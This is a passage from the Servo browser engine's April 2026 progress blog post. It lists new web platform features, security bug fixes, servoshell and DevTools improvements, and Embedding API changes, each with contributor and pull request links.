<li><strong>‘tab-size’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44480">#44480</a>)</li>
<li><strong>‘text-align: match-parent’</strong> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/44073">#44073</a>)</li>
<li><strong>new Worker()</strong> with <strong>blob URLs</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44004">#44004</a>)</li>
<li><strong>get­Context(<code>"webgl"</code>)</strong> on <strong>Offscreen­Canvas</strong> (<a href="https://github.com/niyabits">@niyabits</a>, <a href="https://github.com/servo/servo/pull/44159">#44159</a>)</li>
<li>the <strong>detail</strong> property on <strong>Performance­Mark</strong> and <strong>Performance­Measure</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44289">#44289</a>, <a href="https://github.com/servo/servo/pull/44272">#44272</a>)</li>
</ul>
<p>Plus a bunch of new DOM APIs:</p>
<ul>
<li><strong>‘selectionchange’</strong> events on &lt;input&gt; and &lt;textarea&gt; (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44461">#44461</a>)</li>
<li><strong>Storage­Manager</strong>, in experimental mode (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/43976">#43976</a>)</li>
<li><strong>active­Element</strong> on <strong>Document</strong> and <strong>Shadow­Root</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43861">#43861</a>)</li>
<li><strong>crypto.subtle.supports()</strong> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/43703">#43703</a>) – Servo is the first major browser engine to support this!</li>
<li><strong>cell­Padding</strong>, <strong>cell­Spacing</strong>, and <strong>align</strong> properties on <strong>HTML­Table­Element</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43903">#43903</a>) – previously supported in HTML only</li>
<li><strong>related­Target</strong> on <strong>‘focus’</strong> and <strong>‘blur’</strong> events (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43926">#43926</a>)</li>
<li><strong>transfer­From­Image­Bitmap()</strong> on <strong>Image­Bitmap­Rendering­Context</strong> (<a href="https://github.com/Messi002">@Messi002</a>, <a href="https://github.com/servo/servo/pull/43984">#43984</a>)</li>
</ul>
<p>Servo’s support for text in <strong>Chinese</strong>, <strong>Japanese</strong>, and <strong>Korean</strong> languages has improved, with correct wrapping in the layout engine (<a href="https://github.com/SharanRP">@SharanRP</a>, <a href="https://github.com/servo/servo/pull/43744">#43744</a>), and CJK fonts now enabled in servoshell’s browser UI on Windows, Linux, and FreeBSD (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/CynthiaOketch">@CynthiaOketch</a>, <a href="https://github.com/nortti0">@nortti0</a>, <a href="https://github.com/servo/servo/pull/44055">#44055</a>, <a href="https://github.com/servo/servo/pull/44138">#44138</a>, <a href="https://github.com/servo/servo/pull/44514">#44514</a>).</p>
<p>Navigating to a <strong>JSON file</strong> as the top-level document now renders the JSON with an <strong>interactive pretty-printer</strong> (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43702">#43702</a>).</p>
<p>April was a big milestone for Servo, with some automated tests failing because they had hard-coded cookie expiry dates set to April 2016 plus ten years.
Surprise!
We’re still here.
Here’s to the next 100 years of Servo (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44341">#44341</a>).</p>
<p>This is another big update, so here’s an outline:</p>
<ul>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#security"><strong>Security</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#work-in-progress"><strong>Work in progress</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#servoshell"><strong>servoshell</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#for-developers"><strong>For developers</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#embedding-api"><strong>Embedding API</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#more-on-the-web-platform"><strong>More on the web platform</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#performance-and-stability"><strong>Performance and stability</strong></a></p>
</li>
</ul>
<h3>Security <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#security">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong>Crypto­Key</strong> now zeroes buffers containing key material after use (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44597">#44597</a>).</p>
<p>With only a few exceptions, you can only access DOM APIs in another document if that document is in the <strong>same origin</strong>.
But if that document is in the same <em>site</em> with a different port number, Servo currently allows these accesses even though it shouldn’t.
We’ve fixed some (but not all) of these incorrect accesses, specifically those that involve binding a Window or Location method in this document with a <code>this</code> from the other document (<a href="https://github.com/yvt">@yvt</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/28583">#28583</a>).</p>
<p>We’ve fixed a bug where <strong>local­Storage</strong> and <strong>session­Storage</strong> were usable in <strong>sandboxed &lt;iframe&gt;</strong> and shared with every other sandboxed &lt;iframe&gt;, rather than throwing Security­Error (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44002">#44002</a>).</p>
<p>We’ve fixed a bug where <strong>local­Storage</strong> and <strong>session­Storage</strong> were shared between all <strong>&lt;iframe srcdoc&gt; documents</strong>, rather than isolated using the origin of the containing document (<a href="https://github.com/niyabits">@niyabits</a>, <a href="https://github.com/servo/servo/pull/43988">#43988</a>, <a href="https://github.com/servo/servo/pull/44038">#44038</a>).</p>
<p>We’ve fixed a bug where <strong>IndexedDB</strong> was usable in <strong>sandboxed &lt;iframe&gt;</strong> and <strong>data: URL web workers</strong> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44088">#44088</a>).</p>
<p>We’ve fixed a bug where pages in some <strong>IP address origins</strong> can evict cookies from other IP address origins (<a href="https://github.com/officialasishkumar">@officialasishkumar</a>, <a href="https://github.com/servo/servo/pull/44152">#44152</a>).
Only evicting cookies was possible, not reading or writing them.</p>
<p>We’ve fixed an <strong>out-of-bounds memory read</strong> in <strong>tex­Image3D()</strong> on <strong>Web­GL2­Rendering­Context</strong> (<a href="https://github.com/simartin">@simartin</a>, <a href="https://github.com/servo/servo/pull/44270">#44270</a>), and fixed some undefined behaviour in servoshell’s signal handler (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/43891">#43891</a>).</p>
<h3>Work in progress <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#work-in-progress">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong>IndexedDB</strong> is now enabled in servoshell’s experimental mode (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/44245">#44245</a>).
As always, embedders can enable it with <a href="https://doc.servo.org/servo/struct.Preferences.html"><code>Preferences</code></a>::<a href="https://doc.servo.org/servo/struct.Preferences.html#structfield.dom_indexeddb_enabled"><code>dom­_indexeddb­_enabled</code></a> (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/44245">#44245</a>, <a href="https://github.com/servo/servo/pull/44283">#44283</a>).</p>
<p>IndexedDB now uses Servo’s new <strong>“client storage”</strong> system, which is based on the <a href="https://storage.spec.whatwg.org/">Storage Standard</a> and will allow us to have a unified on-disk format and quota management for all web platform features that persistently store data (<a href="https://github.com/gterzian">@gterzian</a>, <a href="https://github.com/servo/servo/pull/44374">#44374</a>, <a href="https://github.com/servo/servo/pull/43900">#43900</a>).
We’ve also made key range queries more efficient (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/39009">#39009</a>), landed improvements to IDB­Database, IDB­Object­Store, IDB­Cursor, IDB­Key­Range, IDB­Request, and to the handling of transactions, keys, values, and exceptions (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44128">#44128</a>, <a href="https://github.com/servo/servo/pull/43901">#43901</a>, <a href="https://github.com/servo/servo/pull/44009">#44009</a>, <a href="https://github.com/servo/servo/pull/43914">#43914</a>, <a href="https://github.com/servo/servo/pull/44161">#44161</a>, <a href="https://github.com/servo/servo/pull/44183">#44183</a>, <a href="https://github.com/servo/servo/pull/44059">#44059</a>, <a href="https://github.com/servo/servo/pull/44215">#44215</a>, <a href="https://github.com/servo/servo/pull/42998">#42998</a>, <a href="https://github.com/servo/servo/pull/43805">#43805</a>).</p>
<p>We’ve made more progress on the <strong>Intersection­Observer API</strong>, under <code>--pref dom­_intersection­_observer­_enabled</code> (<a href="https://github.com/stevennovaryo">@stevennovaryo</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/42204">#42204</a>).</p>
<p>We’re continuing to implement <strong>document.exec­Command()</strong> for <strong>rich text editing</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44529">#44529</a>), under <code>--pref dom­_exec­_command­_enabled</code>.
This release adds support for the <strong>‘bold’</strong>, <strong>‘font­Name’</strong>, <strong>‘font­Size’</strong>, <strong>‘italic’</strong>, <strong>‘strikethrough’</strong>, and <strong>‘underline’</strong> commands (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44511">#44511</a>, <a href="https://github.com/servo/servo/pull/43287">#43287</a>, <a href="https://github.com/servo/servo/pull/44432">#44432</a>, <a href="https://github.com/servo/servo/pull/44410">#44410</a>, <a href="https://github.com/servo/servo/pull/44194">#44194</a>, <a href="https://github.com/servo/servo/pull/44030">#44030</a>, <a href="https://github.com/servo/servo/pull/44039">#44039</a>, <a href="https://github.com/servo/servo/pull/44041">#44041</a>, <a href="https://github.com/servo/servo/pull/44075">#44075</a>, <a href="https://github.com/servo/servo/pull/44234">#44234</a>, <a href="https://github.com/servo/servo/pull/44250">#44250</a>, <a href="https://github.com/servo/servo/pull/44331">#44331</a>, <a href="https://github.com/servo/servo/pull/44390">#44390</a>, <a href="https://github.com/servo/servo/pull/44137">#44137</a>, <a href="https://github.com/servo/servo/pull/44293">#44293</a>, <a href="https://github.com/servo/servo/pull/44312">#44312</a>, <a href="https://github.com/servo/servo/pull/44347">#44347</a>).</p>
<p>All of the features above are enabled in servoshell’s experimental mode.</p>
<p>Servo can now build a very basic <strong>accessibility tree</strong> for web contents, under <code>--pref accessibility­_enabled</code> (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/lukewarlow">@lukewarlow</a>, <a href="https://github.com/servo/servo/pull/42338">#42338</a>, <a href="https://github.com/servo/servo/pull/43558">#43558</a>, <a href="https://github.com/servo/servo/pull/44437">#44437</a>, <a href="https://github.com/servo/servo/pull/44438">#44438</a>).
This includes text runs, plus nine other non-interactive accessibility roles (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/servo/servo/pull/44255">#44255</a>).
We’ve also fixed a crash when reloading pages with accessibility enabled (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/servo/servo/pull/44473">#44473</a>), and made accessibility tree updates more efficient (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/servo/servo/pull/44208">#44208</a>).</p>
<p>We’ve started implementing the <strong>Sanitizer API</strong>, under <code>--pref dom­_sanitizer­_enabled</code> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44198">#44198</a>, <a href="https://github.com/servo/servo/pull/44290">#44290</a>, <a href="https://github.com/servo/servo/pull/44335">#44335</a>, <a href="https://github.com/servo/servo/pull/44421">#44421</a>, <a href="https://github.com/servo/servo/pull/44452">#44452</a>, <a href="https://github.com/servo/servo/pull/44481">#44481</a>, <a href="https://github.com/servo/servo/pull/44585">#44585</a>, <a href="https://github.com/servo/servo/pull/44594">#44594</a>).</p>
<p>We’ve also started implementing <strong>Shared­Worker</strong>, under <code>--pref dom­_sharedworker­_enabled</code> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44375">#44375</a>, <a href="https://github.com/servo/servo/pull/44440">#44440</a>).</p>
<p>We’re working on the <strong>Wake­Lock API</strong> too, under <code>--pref dom­_wakelock­_enabled</code> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/43617">#43617</a>, <a href="https://github.com/servo/servo/pull/44343">#44343</a>).</p>
<h3>servoshell <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#servoshell">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>servoshell for Android now has a <strong>revamped browser UI</strong>, including a new <strong>history view</strong> (<a href="https://github.com/espy">@espy</a>, <a href="https://github.com/servo/servo/pull/43795">#43795</a>), the <strong>apk is 30% smaller</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44278">#44278</a>, <a href="https://github.com/servo/servo/pull/44182">#44182</a>), and we’ve fixed the black screen bug when closing settings or switching back from another app (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44327">#44327</a>).
You can now close tabs on OpenHarmony too (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/42713">#42713</a>).</p>
<figure>
    <a href="https://servo.org/img/blog/2026-05-android.png"><img alt="servoshell 0.2.0 showing the revamped browser UI on Android. from left to right: viewing a web page, the settings view, the history view" src="https://servo.org/img/blog/2026-05-android.png"></a>
</figure>
<p>As for servoshell on desktop platforms, we’ve fixed some focus- and IME-related bugs (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43872">#43872</a>, <a href="https://github.com/servo/servo/pull/43932">#43932</a>), and on Windows, we now install a normal shortcut without the strange behaviour of an “advertised” shortcut (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44223">#44223</a>).</p>
<h3>For developers <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#for-developers">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>When using the <strong>Inspector</strong> tab in the Firefox <strong>DevTools</strong>, the <strong>Rules</strong> panel now includes declarations in <strong>‘@layer’ rules</strong> (<a href="https://github.com/arabson99">@arabson99</a>, <a href="https://github.com/servo/servo/pull/43912">#43912</a>).</p>
<p>When <strong>logging expressions</strong> in the <strong>Console</strong> tab, and when <strong>hovering over symbols</strong> in the <strong>Debugger</strong> tab, you can now get more information about the contents of functions, arrays, objects, and other values (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/servo/servo/pull/44172">#44172</a>, <a href="https://github.com/servo/servo/pull/44173">#44173</a>, <a href="https://github.com/servo/servo/pull/44022">#44022</a>, <a href="https://github.com/servo/servo/pull/44233">#44233</a>, <a href="https://github.com/servo/servo/pull/44196">#44196</a>, <a href="https://github.com/servo/servo/pull/44181">#44181</a>, <a href="https://github.com/servo/servo/pull/44064">#44064</a>, <a href="https://github.com/servo/servo/pull/44023">#44023</a>, <a href="https://github.com/servo/servo/pull/44164">#44164</a>, <a href="https://github.com/servo/servo/pull/44369">#44369</a>, <a href="https://github.com/servo/servo/pull/44262">#44262</a>).</p>
<p>When using the <strong>Debugger</strong> tab, you can now use the <strong>Scopes</strong> panel to inspect local and global variables (<a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/servo/servo/pull/43792">#43792</a>, <a href="https://github.com/servo/servo/pull/43791">#43791</a>), you can now debug <strong>web worker</strong> scripts (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/servo/servo/pull/43981">#43981</a>), and we’ve started implementing <strong>blackboxing</strong>, aka the <strong>Ignore source</strong> button (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/servo/servo/pull/44142">#44142</a>).</p>
<p>We’ve also landed some initial support for the <strong>Style Editor</strong> tab (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/44517">#44517</a>, <a href="https://github.com/servo/servo/pull/44462">#44462</a>).</p>
<p>We’re working towards re-enabling our automated DevTools tests in CI, which should make the feature more reliable (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/servo/servo/pull/44577">#44577</a>), and we’ve landed a small build reproducibility fix too (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44459">#44459</a>).</p>
<p>For developers of Servo itself, please note that the <strong>Cargo ‘release’ profile</strong> is no longer <code>#[cfg(debug­_assertions)]</code> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44177">#44177</a>).
If you’ve been using ‘release’ as a “faster ‘debug’ with assertions” build locally, consider switching to ‘checked-release’ or ‘medium’.</p>
<p>The pull request template has been updated (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44135">#44135</a>).
<strong>‘Testing’</strong> and <strong>‘Fixes’</strong> should go at the <em>bottom</em> of the PR description, and <strong>‘Testing’</strong> is about automated tests, not how you tested the PR locally.</p>
<p>We’ve made more progress on the new <a href="https://containers.dev/"><strong>dev container</strong></a>, which will provide an alternative to <a href="https://book.servo.org/building/building.html">our usual procedures</a> for setting up a Servo build environment (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/44126">#44126</a>, <a href="https://github.com/servo/servo/pull/44111">#44111</a>, <a href="https://github.com/servo/servo/pull/44162">#44162</a>, <a href="https://github.com/servo/servo/pull/44641">#44641</a>, <a href="https://github.com/servo/servo/pull/44109">#44109</a>).
Keep an eye out for that <a href="https://book.servo.org/building/building.html">in the book</a>!</p>
<p>In the meantime, did you know that you can use <a href="https://lix.systems/"><strong>Lix</strong></a> or <a href="https://nixos.org/manual/nix/stable"><strong>Nix</strong></a> to build Servo on Linux with a lot less hassle, <em>even if</em> you’re not using NixOS?
For now at least, head to the <a href="https://book.servo.org/building/nixos.html">NixOS page</a> in the book to learn more.
We’ve also fixed a regression that made <code>--debug-mozjs</code> and <code>MOZJS­_FROM­_SOURCE</code> builds take much longer to complete on Linux when not using Nix (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44346">#44346</a>).</p>
<p>We’ve fixed building Servo with the <strong>‘jitspew’ feature</strong> in mozjs, allowing you to set <strong>IONFLAGS</strong> to enable JIT logging (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44010">#44010</a>).
We’ve also fixed build issues on Windows and FreeBSD (<a href="https://github.com/zhangxichang">@zhangxichang</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44264">#44264</a>, <a href="https://github.com/servo/servo/pull/44591">#44591</a>).</p>
<h3>Embedding API <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#embedding-api">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>With this second monthly release of the Servo library, we have some quick notes about <strong>API stability</strong> and <strong>semver compatibility</strong>:</p>
<ul>
<li>
<p><strong>The <a href="https://crates.io/crates/servo">‘servo’</a> package</strong> follows <a href="https://doc.rust-lang.org/1.88.0/cargo/reference/specifying-dependencies.html#default-requirements">Cargo’s rules for semver compatibility</a>.
0.1.1 is compatible with version 0.1.0, but 0.2.0 is a breaking update.</p>
</li>
<li>
<p>Until we integrate semver analysis into our release process, each monthly release will have a breaking version number, while non-breaking version numbers may be used for LTS updates.</p>
</li>
<li>
<p>In general, <strong>dependencies of ‘servo’</strong>, like <a href="https://crates.io/crates/servo-base">‘servo-base’</a> and <a href="https://crates.io/crates/servo-script">‘servo-script’</a>, <strong>do not use semver</strong>.
Any release may include breaking changes.</p>
</li>
</ul>
<p>We’ve fixed a <strong>build failure</strong> affecting embedders with a <strong>new or updated Cargo.lock</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44093">#44093</a>), and landed several other changes to help us with the Servo library release process (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/43972">#43972</a>, <a href="https://github.com/servo/servo/pull/44642">#44642</a>, <a href="https://github.com/servo/servo/pull/43182">#43182</a>, <a href="https://github.com/servo/servo/pull/43866">#43866</a>, <a href="https://github.com/servo/servo/pull/44086">#44086</a>, <a href="https://github.com/servo/servo/pull/43797">#43797</a>).</p>
<p>Breaking changes:</p>
<ul>
<li>
<p><a href="https://doc.servo.org/servo/struct.WebView.html"><code>Web­View</code></a>::<a href="https://doc.servo.org/servo/struct.WebView.html#method.animating"><code>animating</code></a> now takes <code>&amp;self</code> instead of <code>self</code>, so you can call it without cloning the handle (<a href="https://github.com/JavaDerg">@JavaDerg</a>, <a href="https://github.com/servo/servo/pull/44253">#44253</a>)</p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/struct.Servo.html"><code>Servo</code></a>::<a href="https://doc.servo.org/servo/struct.Servo.html#method.site_data_manager"><code>site­_data­_manager</code></a> now returns <code>&amp;SiteDataManager</code> instead of <code>Ref&lt;'_, SiteDataManager&gt;</code> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44116">#44116</a>)</p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/trait.WebViewDelegate.html"><code>Web­View­Delegate</code></a>::<code>play­_gamepad­_haptic­_effect</code> and <code>stop­_gamepad­_haptic­_effect</code> have been removed (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43895">#43895</a>), but they have not worked since February 2026 – use <a href="https://doc.servo.org/servo/trait.GamepadDelegate.html"><code>Gamepad­Delegate</code></a> instead</p>
</li>
</ul>
<p>You can now load a URL with <strong>custom request headers</strong> by calling <a href="https://doc.servo.org/servo/struct.WebView.html"><code>Web­View</code></a>::<a href="https://doc.servo.org/servo/struct.WebView.html#method.load_request"><code>load­_request</code></a> (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43338">#43338</a>).</p>
<p>You can now <strong>retrieve cookies asynchronously</strong> by calling <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.cookies_for_url_async"><code>cookies­_for­_url­_async</code></a> (<a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/servo/servo/pull/43794">#43794</a>).</p>
<p>The synchronous version of that method, <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.cookies_for_url"><code>cookies­_for­_url</code></a>, was previously not callable because <a href="https://doc.servo.org/servo/enum.CookieSource.html"><code>Cookie­Source</code></a> was not exposed to the public API, but we’ve fixed that now (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/44124">#44124</a>).</p>
<p>You can now <strong>clear session cookies</strong> without clearing <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Cookies#removal_defining_the_lifetime_of_a_cookie">permanent cookies</a> by calling <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.clear_session_cookies"><code>clear­_session­_cookies</code></a> (<a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/servo/servo/pull/44166">#44166</a>).</p>
<p>When <strong>intercepting requests</strong> with <a href="https://doc.servo.org/servo/trait.ServoDelegate.html"><code>Servo­Delegate</code></a>:: and <a href="https://doc.servo.org/servo/trait.WebViewDelegate.html"><code>Web­View­Delegate</code></a>::<a href="https://doc.servo.org/servo/trait.WebViewDelegate.html#method.load_web_resource"><code>load­_web­_resource</code></a>, we now include a <a href="https://doc.servo.org/servo/struct.WebResourceRequest.html#structfield.destination"><code>destination</code></a> and <a href="https://doc.servo.org/servo/struct.WebResourceRequest.html#structfield.referrer_url"><code>referrer­_url</code></a> in the <a href="https://doc.servo.org/servo/struct.WebResourceRequest.html"><code>Web­Resource­Request</code></a>, which can be helpful if you’re implementing <strong>ad blocking</strong> (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44493">#44493</a>).</p>
<p>You can configure Servo to <strong>write all of its storage to a unique directory</strong> for that session by enabling <a href="https://doc.servo.org/servo/struct.Opts.html"><code>Opts</code></a>::<a href="https://doc.servo.org/servo/struct.Opts.html#structfield.temporary_storage"><code>temporary­_storage</code></a> (<a href="https://github.com/janvarga">@janvarga</a>, <a href="https://github.com/servo/servo/pull/44433">#44433</a>).
Note that these unique directories currently persist after Servo exits, so it’s an isolation feature, not a privacy feature.</p>
<p><a href="https://doc.servo.org/servo/struct.WindowRenderingContext.html"><code>Window­Rendering­Context</code></a>::<a href="https://doc.servo.org/servo/struct.WindowRenderingContext.html#method.new"><code>new</code></a> and <a href="https://doc.servo.org/servo/struct.SoftwareRenderingContext.html"><code>Software­Rendering­Context</code></a>::<a href="https://doc.servo.org/servo/struct.SoftwareRenderingContext.html#method.new"><code>new</code></a> now return an error if the given <code>size</code> is less than 1x1 (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44011">#44011</a>).</p>
<p>We’ve improved our API docs for <a href="https://doc.servo.org/servo/struct.WebView.html"><code>Web­View</code></a>, <a href="https://doc.servo.org/servo/struct.WebViewBuilder.html"><code>Web­View­Builder</code></a>, <a href="https://doc.servo.org/servo/trait.WebViewDelegate.html"><code>Web­View­Delegate</code></a>, <a href="https://doc.servo.org/servo/trait.ServoDelegate.html"><code>ServoDelegate</code></a>, <a href="https://doc.servo.org/servo/struct.PromptDialog.html"><code>Prompt­Dialog</code></a>, <a href="https://doc.servo.org/servo/struct.WebResourceLoad.html"><code>Web­Resource­Load</code></a>, <a href="https://doc.servo.org/servo/webxr/trait.WebXrRegistry.html"><code>Web­Xr­Registry</code></a>, <a href="https://doc.servo.org/servo/struct.Preferences.html"><code>Preferences</code></a>, and servoshell’s <a href="https://doc.servo.org/servoshell/prefs/static.EXPERIMENTAL_PREFS.html"><code>EXPERIMENTAL­_PREFS</code></a> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/43892">#43892</a>, <a href="https://github.com/servo/servo/pull/43787">#43787</a>, <a href="https://github.com/servo/servo/pull/44171">#44171</a>, <a href="https://github.com/servo/servo/pull/43947">#43947</a>).</p>
<p>We’ve also improved our API docs for <a href="https://doc.servo.org/servo/struct.Opts.html"><code>Opts</code></a>, <a href="https://doc.servo.org/servo/enum.OutputOptions.html"><code>Output­Options</code></a>, <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><code>Diagnostics­Logging</code></a>, <a href="https://doc.servo.org/servo/enum.PrefValue.html"><code>Pref­Value</code></a>, <a href="https://doc.servo.org/servo/index.html"><code>servo</code></a>::<a href="https://doc.servo.org/servo/opts/index.html"><code>opts</code></a>, and <a href="https://doc.servo.org/servo_config/index.html"><code>servo­_config</code></a> (<a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/43802">#43802</a>).</p>
<h3>More on the web platform <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#more-on-the-web-platform">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong><kbd>Tab</kbd> navigation</strong> now works across <strong>&lt;iframe&gt;</strong> boundaries (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44397">#44397</a>), and <strong><kbd>Ctrl</kbd>+<kbd>Backspace</kbd></strong> (or <strong><kbd>⌥</kbd><kbd>⌫</kbd></strong>) now <strong>deletes a whole word</strong> in input fields (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43940">#43940</a>).</p>
<p><strong>Tab characters</strong> are now rendered correctly in <strong>&lt;pre&gt;</strong> (and other elements with <strong>‘white-space: pre’</strong>), with proper tab stops (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44480">#44480</a>).
